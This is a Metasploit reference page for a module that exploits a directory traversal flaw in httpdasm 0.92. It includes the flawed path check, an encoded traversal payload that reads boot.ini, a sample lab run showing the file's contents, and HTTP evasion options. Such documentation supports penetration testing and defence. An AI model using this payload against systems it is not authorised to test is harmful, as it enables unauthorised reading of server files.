Httpdasm Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/httpdasm_directory_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Httpdasm Directory Traversal
Module: auxiliary/scanner/http/httpdasm_directory_traversal
Source code: modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
Disclosure date: -
Last modification time: 2019-08-15 18:10:44 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module allows for traversing the file system of a host running httpdasm v0.92.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/scanner/http/httpdasm_directory_traversal
msf auxiliary(httpdasm_directory_traversal) > show targets
    ... a list of targets ...
msf auxiliary(httpdasm_directory_traversal) > set TARGET target-id
msf auxiliary(httpdasm_directory_traversal) > show options
    ... show and set options ...
msf auxiliary(httpdasm_directory_traversal) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a directory traversal vulnerability to read files from a server running httpdasm v0.92.

Vulnerable Application


httpdasm 0.92

The vulnerability can be found in HTTPRqst.asm file.

The beginning of the ServeContent routine attempts to check file path with SafeFilePath:

  1403 invoke SafeFilePath, __this
  1404 .if (!eax) ;File is not safe
  1405 mov m_dwCode, HTTP_STATUS_FORBIDDEN
  1406 jmp doneHTTPGet
  1407 .endif
  1408 invoke ExtractFilename, __this
  1409 .if (!eax)
  1410 mov m_dwCode, HTTP_STATUS_URI_TOO_LONG ;max URI is 256 here
  1411 jmp doneHTTPGe$
  1412 .endif

The SafeFilePath checks for directory traversal with these possible values such as "..", "//", "\", ":", which is inadequate to prevent a traversal attack:

  502 .if ((cx == '..') || (cx == '//') || (cl == '\') || (cl == ':'))
  1503 return 0
  1504 .endif

Verification Steps


  1. Start msfconsole
  2. use [auxiliary/scanner/http/httpdasm_directory_traversal]
  3. set RHOSTS [IP]
  4. run

Scenarios


Tested on Windows XP x86

  msf5 > use auxiliary/scanner/http/httpdasm_directory_traversal
  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128
  rhosts => 192.168.37.128
  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > run

  [boot loader]
  timeout=30
  default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
  [operating systems]
  multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

  [*] Auxiliary module execution completed
  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) >

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/httpdasm_directory_traversal auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/httpdasm_directory_traversal

msf6 auxiliary(scanner/http/httpdasm_directory_traversal) > show info

       Name: Httpdasm Directory Traversal
     Module: auxiliary/scanner/http/httpdasm_directory_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  John Leitch
  Shelby Pace

Check supported:
  No

Basic options:
  Name       Current Setting                                                                   Required  Description
  ----       ---------------                                                                   --------  -----------
  Proxies                                                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                                                                                yes       The target port (TCP)
  SSL        false                                                                             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini  yes       Path to traverse to
  VHOST                                                                                        no        HTTP server virtual host

Description:
  This module allows for traversing the file system of a host running 
  httpdasm v0.92.

References:
  https://www.exploit-db.com/exploits/15861

Module Options


This is a complete list of options available in the scanner/http/httpdasm_directory_traversal auxiliary module:

msf6 auxiliary(scanner/http/httpdasm_directory_traversal) > show options

Module options (auxiliary/scanner/http/httpdasm_directory_traversal):

   Name       Current Setting                                                                   Required  Description
   ----       ---------------                                                                   --------  -----------
   Proxies                                                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                                                                yes       The target port (TCP)
   SSL        false                                                                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini  yes       Path to traverse to
   VHOST                                                                                        no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/httpdasm_directory_traversal auxiliary module:

msf6 auxiliary(scanner/http/httpdasm_directory_traversal) > show advanced

Module advanced options (auxiliary/scanner/http/httpdasm_directory_traversal):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/httpdasm_directory_traversal module can do:

msf6 auxiliary(scanner/http/httpdasm_directory_traversal) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/httpdasm_directory_traversal auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/httpdasm_directory_traversal) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unexpected response from server: <RES.CODE>


Here is a relevant code snippet related to the "Unexpected response from server: <RES.CODE>" error message:

40:	    if res && res.code == 200
41:	      print_status(res.body)
42:	      path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
43:	    else
44:	      if res
45:	        print_error("Unexpected response from server: #{res.code}")
46:	      else
47:	        print_error("The server timed out.")
48:	      end
49:	    end
50:	  end

The server timed out.


Here is a relevant code snippet related to the "The server timed out." error message:

41:	      print_status(res.body)
42:	      path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
43:	    else
44:	      if res
45:	        print_error("Unexpected response from server: #{res.code}")
46:	      else
47:	        print_error("The server timed out.")
48:	      end
49:	    end
50:	  end
51:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • John Leitch
  • Shelby Pace

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.